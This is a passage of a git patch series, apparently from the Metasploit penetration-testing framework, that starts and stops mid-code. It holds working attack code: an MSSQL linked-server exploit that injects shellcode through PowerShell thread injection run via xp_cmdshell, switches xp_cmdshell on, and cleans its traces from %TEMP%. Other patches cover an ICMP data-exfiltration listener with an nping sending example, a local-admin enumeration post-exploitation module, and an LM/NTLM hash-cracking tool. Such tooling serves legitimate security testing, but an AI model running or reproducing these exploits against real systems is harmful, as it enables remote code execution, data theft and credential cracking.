query_builder(path,sql,ticks,execute,nowrap=false) - # Temp used to maintain the original masterList[x]["path"] - temp = Array.new - path.each {|i| temp << i} - # actual query - defined when the function originally called - ticks multiplied - if path.length == 0 - if ticks == 0 and nowrap == false and datastore['TYPE'].to_s.downcase == "error" - execute = "(select cast('startmsf'+(" + execute + ")+'endmsf' as int))" - elsif ticks == 0 and nowrap == false and datastore['TYPE'].to_s.downcase == "union" - execute = "(select 'startmsf'+(" + execute + ")+'endmsf')" - end - return execute.gsub("'","'"*2**ticks) - # openquery generator - else - sql = "(select * from openquery(\"" + temp.shift + "\"," + "'"*2**ticks + query_builder(temp,sql,ticks+1,execute) + "'"*2**ticks + "))" - if ticks == 0 and nowrap == false and datastore['TYPE'].to_s.downcase == "error" - sql = "(select cast('startmsf'+(" + sql + ")+'endmsf' as int))" - elsif ticks == 0 and nowrap == false and datastore['TYPE'].to_s.downcase == "union" - sql = "(select 'startmsf'+(" + sql + ")+'endmsf')" - end - return sql - end - end - - #------------------------------------------------------------------------------------- - # Method for adding new linked database servers to the crawl list - #------------------------------------------------------------------------------------- - def add_host(name,path) - # Used to add new servers to masterList - server = Hash.new - server["name"] = name # Name of the current database server - temppath = Array.new - path.each {|i| temppath << i } - server["path"] = [temppath] - server["path"].first << name - server["done"] = 0 - return server - end - - #------------------------------------------------------------------------------------- - # Method for generating the report - #------------------------------------------------------------------------------------- - def write_to_report(server_name,server_path,master_name,privstatus,badlink,linked_server_table) - # Set server name - report_server = server_name - # Set path - if server_path.first.first == nil #can be used to determine if entry point - report_path = "NA" - frontlabel = "" - else - report_path = "#{master_name} -> #{server_path.first.join(" -> ")}" - frontlabel = "Link " - end - # Set privilege level language - if privstatus == 0 then - report_priv = "USER" - else - report_priv = "SYSADMIN!" - end - # Set bad link language - if badlink == 1 then - report_status = "DOWN" - report_priv = "NA" - else - report_status = "UP" - end - # Add report entry - linked_server_table << [report_server,report_path,report_priv,report_status] - return linked_server_table - end - - #------------------------------------------------------------------------------------- - # Method that delivers shellcode payload via powershell thread injection - # Leaves a powershell process running on the target system - # Code based on http://www.exploit-monday.com/2011_10_16_archive.html - #------------------------------------------------------------------------------------- - def powershell_upload_exec(path) - - print_status("Deploying a payload") - # Create powershell script that will inject our shell code - # Note: Must start multi/handler and set DisablePayloadHandler if expecting multiple shells - myscript ="$code = @\" -[DllImport(\"kernel32.dll\")] -public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); -[DllImport(\"kernel32.dll\")] -public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); -[DllImport(\"msvcrt.dll\")] -public static extern IntPtr memset(IntPtr dest, uint src, uint count); -\"@ -$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru -[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')} -$size = 0x1000 -if ($sc.Length -gt 0x1000) {$size = $sc.Length} -$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) -for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)} -$winFunc::CreateThread(0,0,$x,0,0,0)" - - # Unicode encode powershell script - mytext_uni = Rex::Text.to_unicode(myscript) - - # Base64 encode unicode - mytext_64 = Rex::Text.encode_base64(mytext_uni) - - # Generate random file name - rand_filename = rand_text_alpha(8) - var_duplicates = rand_text_alpha(8) - - # Write base64 encode powershell payload to temp file - # This is written 2500 characters at a time due to xp_cmdshell ruby function limitations - # Adding line number tracking to remove line duplication from nested link write commands - linenum = 0 - mytext_64.scan(/.{1,2500}/).each {|part| - execute = "(select 1); EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'" - sql = query_builder(path,"",0,execute,true) - result = mssql_query(sql, false) - linenum = linenum+1 - } - - # Remove duplicate lines from temp file and write to new file - execute = "(select 1);exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'" - sql = query_builder(path,"",0,execute,true) - result = mssql_query(sql, false) - - execute = "(select 1);exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'" - sql = query_builder(path,"",0,execute,true) - result = mssql_query(sql, false) - - # Generate base64 encoded powershell command we can use noexit and avoid parsing errors - # If running on 64bit system, 32bit powershell called from syswow64 - path to Powershell on 64bit systems hardcoded - powershell_cmd = "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) \ - -join '';if((gci env:processor_identifier).value -like '*64*'){$psbits=\"C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe \ - -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe -noexit -noprofile -encodedCommand $dacode\"};iex $psbits" - powershell_uni = Rex::Text.to_unicode(powershell_cmd) - powershell_base64 = Rex::Text.encode_base64(powershell_uni) - - ## Setup and execute shellcode with powershell via xp_cmdshell - print_status("Executing the payload") - execute = "(select 1); EXEC master..xp_cmdshell 'powershell -EncodedCommand #{powershell_base64}'" - sql = query_builder(path,"",0,execute,true) - result = mssql_query(sql, false) - - # Remove payload data from the target server - execute = "(select 1); EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'" - sql = query_builder(path,"",0,execute,true) - result = mssql_query(sql,false) - end -end From 5667cffb77d2e5f1a17ec495c04ea440b9a9a2e9 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Tue, 20 Nov 2012 09:06:15 +0100 Subject: [PATCH 016/154] Fixed typos --- modules/auxiliary/server/icmp_exfil.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index 680b4556a4..0489983a27 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_START']) if not icmp_response - raise RuntimeError ,"Could not build ICMP resonse" + raise RuntimeError ,"Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_END']) if not icmp_response - raise RuntimeError , "Could not build ICMP resonse" + raise RuntimeError , "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) @@ -188,7 +188,7 @@ class Metasploit3 < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_CONT']) if not icmp_response - raise RuntimeError , "Could not build ICMP resonse" + raise RuntimeError , "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) From 8c60035a2ddf582257a11c9f289d5dc4a6bb266b Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Tue, 20 Nov 2012 18:48:18 +0100 Subject: [PATCH 017/154] Renamed functions to meet coding standards Added client-side tool suggestion in description and references (newlines in the description might help readability, if this is possible?) Added some minor logic change to stop empty filenames --- modules/auxiliary/server/icmp_exfil.rb | 34 +++++++++++++++++--------- 1 file changed, 22 insertions(+), 12 deletions(-) diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index 0489983a27..e29806cdb0 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -27,14 +27,22 @@ class Metasploit3 < Msf::Auxiliary specific start trigger (defaults to '^BOF') this can be followed by the filename being sent (or a random filename can be assisnged). All data received from this source will automatically be added to the receive buffer until an ICMP echo request containing a specific end trigger - (defaults to 'EOL') is received. + (defaults to '^EOL') is received. + + Suggested Client: + Data can be sent from the client using a variety of tools. One such example is nping (included + with the NMAP suite of tools) - usage: nping --icmp 10.0.0.1 --data-string "BOFtest.txt" -c1 }, 'Author' => 'Chris John Riley', 'License' => MSF_LICENSE, 'References' => [ # packetfu - ['URL','http://code.google.com/p/packetfu/'] + ['URL','http://code.google.com/p/packetfu/'], + # nping + ['URL', 'http://nmap.org/book/nping-man.html'], + # simple icmp + ['URL', 'http://blog.c22.cc/2012/02/17/quick-post-fun-with-python-ctypes-simpleicmp/'] ] ) @@ -84,15 +92,15 @@ class Metasploit3 < Msf::Auxiliary end # start icmp listener process - loop - icmplistener + icmp_listener ensure - storefile + store_file print_status("\nStopping ICMP listener on #{@interface} (#{@iface_ip})") end end - def icmplistener + def icmp_listener # start icmp listener print_status("ICMP Listener started on #{@interface} (#{@iface_ip}). Monitoring for trigger packet containing #{datastore['START_TRIGGER']}") @@ -128,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary if @record print_error("New file started without saving old data") - storefile + store_file end # begin recording stream @@ -136,11 +144,13 @@ class Metasploit3 < Msf::Auxiliary @record_host = packet.ip_saddr @record_data = '' - # set filename in packet or set random value + # set filename from data in incoming icmp packet if datastore['FNAME_IN_PACKET'] - @filename = data[((datastore['START_TRIGGER'].length)-1)..-1].strip # set filename from icmp payload - else - @filename = "icmp_exfil_" + ::Time.now.to_i # set random filename + @filename = data[((datastore['START_TRIGGER'].length)-1)..-1].strip + end + # if filename not sent in packet, or FNAME_IN_PACKET false set time based name + if not datastore['FNAME_IN_PACKET'] or @filename.empty? + @filename = "icmp_exfil_" + ::Time.now.to_i.to_s # set filename based on current time end print_good("Beginning capture of \"#{@filename}\" data") @@ -162,7 +172,7 @@ class Metasploit3 < Msf::Auxiliary # end of file marker found print_status("#{@record_data.length} bytes of data recevied in total") print_good("End of File received. Saving \"#{@filename}\" to loot") - storefile + store_file # create response packet icmp_pkt icmp_response, contents = icmp_packet(packet, datastore['RESP_END']) @@ -233,7 +243,7 @@ class Metasploit3 < Msf::Auxiliary vprint_good("Response sent to #{@dst_ip} containing response trigger : \"#{contents}\"") end - def storefile + def store_file # store the file in loot if data is present if @record_data and not @record_data.empty? loot = store_loot( From 46f3b8f47dea694d51890817c9b0e94e8882d7ac Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Thu, 22 Nov 2012 16:00:38 +0100 Subject: [PATCH 018/154] Minor changes to get Travis to rerun (The Travis build failed) --- modules/auxiliary/server/icmp_exfil.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index e29806cdb0..f06a15b3eb 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary def run begin - #Check Pcaprub is up to date + # check Pcaprub is up to date if not netifaces_implemented? print_error("WARNING : Pcaprub is not uptodate, some functionality will not be available") netifaces = false @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary end @interface = datastore['INTERFACE'] || Pcap.lookupdev - #This is needed on windows cause we send interface directly to Pcap functions + # this is needed on windows cause we send interface directly to Pcap functions @interface = get_interface_guid(@interface) @iface_ip = datastore['LOCALIP'] @iface_ip ||= Pcap.lookupaddrs(@interface)[0] if netifaces From 501224f21fd7315cc67916133071e9e1de2309b8 Mon Sep 17 00:00:00 2001 From: Brandon McCann Date: Sat, 1 Dec 2012 11:03:11 -0600 Subject: [PATCH 019/154] setup() added --- .../windows/gather/local_admin_search_enum.rb | 25 ++++++++++++------- 1 file changed, 16 insertions(+), 9 deletions(-) diff --git a/modules/post/windows/gather/local_admin_search_enum.rb b/modules/post/windows/gather/local_admin_search_enum.rb index ccdac04c2b..b7fc5a5e5b 100644 --- a/modules/post/windows/gather/local_admin_search_enum.rb +++ b/modules/post/windows/gather/local_admin_search_enum.rb @@ -43,13 +43,15 @@ class Metasploit3 < Msf::Post ], self.class) end - def run + def setup + super + if is_system? # running as SYSTEM and will not pass any network credentials print_error "Running as SYSTEM, module should be run with USER level rights" return else - adv = client.railgun.advapi32 + @adv = client.railgun.advapi32 # Get domain and domain controller if options left blank if datastore['DOMAIN'].nil? @@ -76,7 +78,6 @@ class Metasploit3 < Msf::Post print_error("User never logged into device, will not enumerate groups or manually specify DC.") end end - super end end @@ -93,6 +94,7 @@ class Metasploit3 < Msf::Post winsessions = client.railgun.netapi32.NetWkstaUserEnum("\\\\#{host}", 1, 4, -1, 4, 4, nil) rescue ::Exception => e print_error("Issue enumerating users on #{host}") + print_error(e.backtrace) if datastore['VERBOSE'] end count = winsessions['totalentries'] * 2 startmem = winsessions['bufptr'] @@ -120,7 +122,7 @@ class Metasploit3 < Msf::Post # an error, or if option disabled data = "" if datastore['DOMAIN'].upcase == temp[:domain].upcase and not @dc_error and datastore['ENUM_GROUPS'] - data = " - Groups: #{enum_groups(temp[:user]).chomp(", ")}" + data << " - Groups: #{enum_groups(temp[:user]).chomp(", ")}" end line = "\tLogged in user:\t#{temp[:domain]}\\#{temp[:user]}#{data}\n" @@ -134,6 +136,7 @@ class Metasploit3 < Msf::Post } rescue ::Exception => e print_error("Issue enumerating users on #{host}") + print_error(e.backtrace) if datastore['VERBOSE'] end return userlist end @@ -188,9 +191,13 @@ class Metasploit3 < Msf::Post # http://msdn.microsoft.com/en-us/library/windows/desktop/ms684323(v=vs.85).aspx # method to connect to remote host using windows api def connect(host) + if @adv.nil? + return + end + user = client.sys.config.getuid # use railgun and OpenSCManagerA api to connect to remote host - manag = adv.OpenSCManagerA("\\\\#{host}", nil, 0xF003F) # SC_MANAGER_ALL_ACCESS + manag = @adv.OpenSCManagerA("\\\\#{host}", nil, 0xF003F) # SC_MANAGER_ALL_ACCESS if(manag["return"] != 0) # we have admin rights result = "#{host.ljust(16)} #{user} - Local admin found\n" @@ -203,10 +210,10 @@ class Metasploit3 < Msf::Post end # close the handle if connection was made - adv.CloseServiceHandle(manag["return"]) + @adv.CloseServiceHandle(manag["return"]) # Append data to loot table within database - db_loot(host, user, "localadmin.user") print_good(result.chomp("\n")) unless result.nil? + db_loot(host, user, "localadmin.user") else # we dont have admin rights print_error("#{host.ljust(16)} #{user} - No Local Admin rights") @@ -229,7 +236,7 @@ class Metasploit3 < Msf::Post def db_loot(host, user, type) if db p = store_loot(type, 'text/plain', host, "#{host}:#{user}", 'hosts_localadmin.txt', user) - print_status("User data stored in: #{p}") + print_status("User data stored in: #{p}") if datastore['VERBOSE'] end end -end +end \ No newline at end of file From 5be12c1ad341952d57810d33487b67150a55012a Mon Sep 17 00:00:00 2001 From: Brandon McCann Date: Sat, 1 Dec 2012 12:04:34 -0600 Subject: [PATCH 020/154] add verbose output --- modules/post/windows/gather/local_admin_search_enum.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/modules/post/windows/gather/local_admin_search_enum.rb b/modules/post/windows/gather/local_admin_search_enum.rb index b7fc5a5e5b..383c7cd43b 100644 --- a/modules/post/windows/gather/local_admin_search_enum.rb +++ b/modules/post/windows/gather/local_admin_search_enum.rb @@ -105,6 +105,7 @@ class Metasploit3 < Msf::Post mem = client.railgun.memread(startmem, 8*count) rescue ::Exception => e print_error("Issue reading memory for #{host}") + print_error(e.backtrace) if datastore['VERBOSE'] end # For each entry returned, get domain and name of logged in user begin @@ -153,6 +154,7 @@ class Metasploit3 < Msf::Post rescue ::Exception => e print_error("Issue connecting to DC, try manually setting domain and DC") + print_error(e.backtrace) if datastore['VERBOSE'] end count = usergroups['totalentries'] @@ -163,6 +165,7 @@ class Metasploit3 < Msf::Post mem = client.railgun.memread(startmem, 8*count) rescue ::Exception => e print_error("Issue reading memory for groups for user #{user}") + print_error(e.backtrace) if datastore['VERBOSE'] end begin @@ -182,6 +185,7 @@ class Metasploit3 < Msf::Post rescue ::Exception => e print_error("Issue enumerating groups for user #{user}, check domain") + print_error(e.backtrace) if datastore['VERBOSE'] end return grouplist.chomp("\n\t- ") From 6c55e6018dd33abbb7c2c54c4356292c6a2799fe Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Tue, 4 Dec 2012 16:38:22 -0500 Subject: [PATCH 021/154] add fix provided by Kurt G in #7351 --- tools/lm2ntcrack.rb | 288 +++++++++++++++++++------------------------- 1 file changed, 124 insertions(+), 164 deletions(-) diff --git a/tools/lm2ntcrack.rb b/tools/lm2ntcrack.rb index e5c5e163a3..9bd1893e42 100755 --- a/tools/lm2ntcrack.rb +++ b/tools/lm2ntcrack.rb @@ -37,6 +37,27 @@ def usage exit end +def permute_pw(pw) + # fast permutation from http://stackoverflow.com/a/1398900 + perms = [""] + if pw.nil? + return perms + end + tail = pw.downcase + while tail.length > 0 do + head, tail, psize = tail[0..0], tail[1..-1], perms.size + hu = head.upcase + for i in (0...psize) + tp = perms[i] + perms[i] = tp + hu + if hu != head + perms.push(tp + head) + end + end + end + return perms +end + type = hash = pass = srvchal = clichal = calculatedhash = list = user = domain = nil $args = Rex::Parser::Arguments.new( @@ -128,8 +149,6 @@ when "HALFLM" $stderr.puts "[*] HALFLM HASH must be exactly 16 bytes of hexadecimal" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') @@ -137,20 +156,14 @@ when "HALFLM" puts password calculatedhash = CRYPT::lm_hash(password,true).unpack("H*")[0].upcase if calculatedhash == hash.upcase - found = true - match_password = password - break + puts "[*] Correct password found : #{password.upcase}" + exit end end end end - if found - puts "[*] Correct password found : #{match_password.upcase}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not pass =~ /^.{0,7}$/ $stderr.puts "[*] LM password can not be bigger then 7 characters" @@ -185,8 +198,6 @@ when "LM" $stderr.puts "[*] LM HASH must be exactly 32 bytes of hexadecimal" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') @@ -194,20 +205,14 @@ when "LM" puts password calculatedhash = CRYPT::lm_hash(password.upcase).unpack("H*")[0].upcase if calculatedhash == hash.upcase - found = true - match_password = password - break + puts "[*] Correct password found : #{password.upcase}" + exit end end end end - if found - puts "[*] Correct password found : #{match_password.upcase}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not pass =~ /^.{0,14}$/ $stderr.puts "[*] LM password can not be bigger then 14 characters" @@ -242,27 +247,21 @@ when "NTLM" $stderr.puts "[*] NTLM HASH must be exactly 32 bytes of hexadecimal" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') - puts password - calculatedhash = CRYPT::ntlm_hash(password).unpack("H*")[0].upcase - if calculatedhash == hash.upcase - found = true - match_password = password - break + for permutedpw in permute_pw(password) + puts permutedpw + calculatedhash = CRYPT::ntlm_hash(permutedpw).unpack("H*")[0].upcase + if calculatedhash == hash.upcase + puts "[*] Correct password found : #{permutedpw}" + exit + end end end end - if found - puts "[*] Correct password found : #{match_password}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE calculatedhash = CRYPT::ntlm_hash(pass).unpack("H*")[0].upcase puts "[*] The NTLM hash for #{pass} is : #{calculatedhash}" @@ -272,14 +271,14 @@ when "NTLM" $stderr.puts "[*] NTLM HASH must be exactly 32 bytes of hexadecimal" exit end - calculatedhash = CRYPT::ntlm_hash(pass).unpack("H*")[0].upcase - if hash.upcase == calculatedhash - puts "[*] Correct password provided : #{pass}" - exit - else - puts "[*] Incorrect password provided : #{pass}" - exit + for permutedpw in permute_pw(pass) + calculatedhash = CRYPT::ntlm_hash(permutedpw).unpack("H*")[0].upcase + if hash.upcase == calculatedhash + puts "[*] Correct password provided : #{permutedpw}" + exit + end end + puts "[*] Incorrect password provided : #{pass}" end when "HALFNETLMv1" case mode @@ -296,8 +295,6 @@ when "HALFNETLMv1" $stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') @@ -308,20 +305,14 @@ when "HALFNETLMv1" :challenge => [ srvchal ].pack("H*") } calculatedhash = CRYPT::lm_response(arglm,true).unpack("H*")[0].upcase if calculatedhash == hash.upcase - found = true - match_password = password - break + puts "[*] Correct password found : #{password.upcase}" + exit end end end end - if found - puts "[*] Correct password found : #{match_password.upcase}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not pass =~ /^.{0,7}$/ $stderr.puts "[*] HALFNETLMv1 password can not be bigger then 7 characters" @@ -386,8 +377,6 @@ when "NETLMv1" $stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') @@ -397,20 +386,14 @@ when "NETLMv1" :challenge => [ srvchal ].pack("H*") } calculatedhash = CRYPT::lm_response(arglm).unpack("H*")[0].upcase if calculatedhash == hash.upcase - found = true - match_password = password - break + puts "[*] Correct password found : #{password.upcase}" + exit end end end end - if found - puts "[*] Correct password found : #{match_password.upcase}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not pass =~ /^.{1,14}$/ $stderr.puts "[*] NETLMv1 password can not be bigger then 14 characters" @@ -474,29 +457,23 @@ when "NETNTLMv1" $stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') - puts password - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password), - :challenge => [ srvchal ].pack("H*") } - calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase - if calculatedhash == hash.upcase - found = true - match_password = password - break + for permutedpw in permute_pw(password) + puts permutedpw + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(permutedpw), + :challenge => [ srvchal ].pack("H*") } + calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase + if calculatedhash == hash.upcase + puts "[*] Correct password found : #{permutedpw}" + exit + end end end end - if found - puts "[*] Correct password found : #{match_password}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not srvchal $stderr.puts "[*] Server challenge must be provided with this type" @@ -524,17 +501,18 @@ when "NETNTLMv1" $stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal" exit end - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), - :challenge => [ srvchal ].pack("H*") } + for permutedpw in permute_pw(pass) + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(permutedpw), + :challenge => [ srvchal ].pack("H*") } - calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase - if hash.upcase == calculatedhash - puts "[*] Correct password provided : #{pass}" - exit - else - puts "[*] Incorrect password provided : #{pass}" - exit + calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase + if hash.upcase == calculatedhash + puts "[*] Correct password provided : #{permutedpw}" + exit + end end + puts "[*] Incorrect password provided : #{pass}" + exit end when "NETNTLM2_SESSION" case mode @@ -560,32 +538,26 @@ when "NETNTLM2_SESSION" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') - puts password - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password), - :challenge => [ srvchal ].pack("H*") } - optntlm = { :client_challenge => [ clichal ].pack("H*")} + for permutedpw in permute_pw(password) + puts permutedpw + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(permutedpw), + :challenge => [ srvchal ].pack("H*") } + optntlm = { :client_challenge => [ clichal ].pack("H*")} - calculatedhash = CRYPT::ntlm2_session(argntlm,optntlm).join[24,24].unpack("H*")[0].upcase + calculatedhash = CRYPT::ntlm2_session(argntlm,optntlm).join[24,24].unpack("H*")[0].upcase - if calculatedhash == hash.upcase - found = true - match_password = password - break + if calculatedhash == hash.upcase + puts "[*] Correct password found : #{permutedpw}" + exit + end end end end - if found - puts "[*] Correct password found : #{match_password}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not srvchal $stderr.puts "[*] Server challenge must be provided with this type" @@ -631,19 +603,20 @@ when "NETNTLM2_SESSION" $stderr.puts "[*] Client challenge must be exactly 16 bytes of hexadecimal" exit end - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), - :challenge => [ srvchal ].pack("H*") } - optntlm = { :client_challenge => [ clichal ].pack("H*")} + for permutedpw in permute_pw(pass) + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(permutedpw), + :challenge => [ srvchal ].pack("H*") } + optntlm = { :client_challenge => [ clichal ].pack("H*")} - calculatedhash = CRYPT::ntlm2_session(argntlm,optntlm).join[24,24].unpack("H*")[0].upcase + calculatedhash = CRYPT::ntlm2_session(argntlm,optntlm).join[24,24].unpack("H*")[0].upcase - if hash.upcase == calculatedhash - puts "[*] Correct password provided : #{pass}" - exit - else - puts "[*] Incorrect password provided : #{pass}" - exit + if hash.upcase == calculatedhash + puts "[*] Correct password provided : #{permutedpw}" + exit + end end + puts "[*] Incorrect password provided : #{pass}" + exit end when "NETLMv2" case mode @@ -677,8 +650,6 @@ when "NETLMv2" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') @@ -688,19 +659,13 @@ when "NETLMv2" optlm = { :client_challenge => [ clichal ].pack("H*")} calculatedhash = CRYPT::lmv2_response(arglm, optlm).unpack("H*")[0].upcase if calculatedhash.slice(0,32) == hash.upcase - found = true - match_password = password - break + puts "[*] Correct password found : #{password}" + exit end end end - if found - puts "[*] Correct password found : #{match_password}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not srvchal $stderr.puts "[*] Server challenge must be provided with this type" @@ -808,31 +773,25 @@ when "NETNTLMv2" exit end - found = false - match_password = nil File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') - puts password - argntlm = { :ntlmv2_hash => CRYPT::ntlmv2_hash(user, password, domain), - :challenge => [ srvchal ].pack("H*") } - optntlm = { :nt_client_challenge => [ clichal ].pack("H*")} - calculatedhash = CRYPT::ntlmv2_response(argntlm,optntlm).unpack("H*")[0].upcase + for permutedpw in permute_pw(password) + puts permutedpw + argntlm = { :ntlmv2_hash => CRYPT::ntlmv2_hash(user, permutedpw, domain), + :challenge => [ srvchal ].pack("H*") } + optntlm = { :nt_client_challenge => [ clichal ].pack("H*")} + calculatedhash = CRYPT::ntlmv2_response(argntlm,optntlm).unpack("H*")[0].upcase - if calculatedhash.slice(0,32) == hash.upcase - found = true - match_password = password - break + if calculatedhash.slice(0,32) == hash.upcase + puts "[*] Correct password found : #{password}" + exit + end end end end - if found - puts "[*] Correct password found : #{match_password}" - exit - else - puts "[*] No password found" - exit - end + puts "[*] No password found" + exit when HASH_MODE if not srvchal $stderr.puts "[*] Server challenge must be provided with this type" @@ -896,18 +855,19 @@ when "NETNTLMv2" exit end - argntlm = { :ntlmv2_hash => CRYPT::ntlmv2_hash(user, pass, domain), - :challenge => [ srvchal ].pack("H*") } - optntlm = { :nt_client_challenge => [ clichal ].pack("H*")} - calculatedhash = CRYPT::ntlmv2_response(argntlm,optntlm).unpack("H*")[0].upcase + for permutedpw in permute_pw(password) + argntlm = { :ntlmv2_hash => CRYPT::ntlmv2_hash(user, permutedpw, domain), + :challenge => [ srvchal ].pack("H*") } + optntlm = { :nt_client_challenge => [ clichal ].pack("H*")} + calculatedhash = CRYPT::ntlmv2_response(argntlm,optntlm).unpack("H*")[0].upcase - if hash.upcase == calculatedhash.slice(0,32) - puts "[*] Correct password provided : #{pass}" - exit - else - puts "[*] Incorrect password provided : #{pass}" - exit + if hash.upcase == calculatedhash.slice(0,32) + puts "[*] Correct password provided : #{permutedpw}" + exit + end end + puts "[*] Incorrect password provided : #{pass}" + exit end else $stderr.puts "type must be of type : HALFLM/LM/NTLM/HALFNETLMv1/NETLMv1/NETNTLMv1/NETNTLM2_SESSION/NETLMv2/NETNTLMv2" From 67829756f8014ab826fb07926b619e575c0936ba Mon Sep 17 00:00:00 2001 From: nullbind Date: Wed, 12 Dec 2012 17:45:02 -0600 Subject: [PATCH 022/154] fixed errors --- modules/exploits/windows/mssql/mssql_linkcrawler.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index 9f37d7c388..d33c237ce9 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -396,7 +396,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Enabling xp_cmdshell - print_status("\t - xp_cmdshell is not enabled on " + path.last + "... Trying to enable") + print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable") execute = "sp_configure 'xp_cmdshell',1;reconfigure" sql = query_builder_rpc(path,"",0,execute) result = mssql_query(sql, false) if mssql_login_datastore @@ -409,7 +409,7 @@ class Metasploit3 < Msf::Exploit::Remote xpcmdNow = result[:rows].pop.pop if xpcmdNow == 1 or xpcmdOrig == 1 - print_status("\t - Enabled xp_cmdshell on " + path.last) if xpcmdOrig == 